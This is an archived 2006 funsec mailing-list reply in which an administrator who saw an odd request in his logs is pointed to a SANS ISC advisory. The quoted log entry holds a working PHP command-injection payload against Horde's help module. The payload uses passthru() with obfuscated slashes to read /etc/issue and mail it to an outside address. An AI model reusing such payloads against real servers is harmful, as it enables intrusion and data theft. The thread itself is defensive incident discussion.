funsec mailing list archives

Re: interesting attack

From: Anthony Rodgers <cunningpike () gmail com>
Date: Sun, 16 Apr 2006 09:45:47 -0700

Hi Dennis,

Didn't see you get any replies - what you're seeing is likely relatedto this:


<http://isc.sans.org/diary.php?storyid=1268>

--
Anthony Rodgers
cunningpike () gmail com

"Genuinely objective journalism not only gets the facts right, itgets the meaning of events right. It is compelling not only today,but stands the test of time. It is validated not only by 'reliablesources', but by the unfolding of history. It is journalism that ten,twenty, fifty years after the fact still holds up a true andintelligent mirror to events." - T.D. Allman.



On 14-Apr-06, at 7:11 AM, Henderson, Dennis K. wrote:

Which web server would be a target for this GET?
Not sure what group to post this to but I'm sure having funwatching the
attempts..

:)




GET
/horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@gmail.
com%22);'. HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: x.x.x.x
Connection: Close
------------------------------------------------------------------------------NOTICE: This electronic mail message and any attached files areconfidential. The information is exclusively for the use of theindividual or entity intended as the recipient. If you are not theintended recipient, any use, copying, printing, reviewing,retention, disclosure, distribution or forwarding of the message orany attached file is not authorized and is strictly prohibited. Ifyou have received this electronic mail message in error, pleaseadvise the sender by reply electronic mail immediately andpermanently delete the original transmission, any attachments andany copies of this message from your computer system. Thank you.
==============================================================================
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.


_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Current thread:

interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
  - Re: interesting attack Technocrat (Apr 19)
    - Re: interesting attack Valdis . Kletnieks (Apr 19)
    - Re: interesting attack Brian Loe (Apr 19)
    - Re: interesting attack Valdis . Kletnieks (Apr 19)
    - Re: interesting attack Brian Loe (Apr 19)
    - Re: interesting attack Peter Kosinar (Apr 19)
    - Re: interesting attack Technocrat (Apr 19)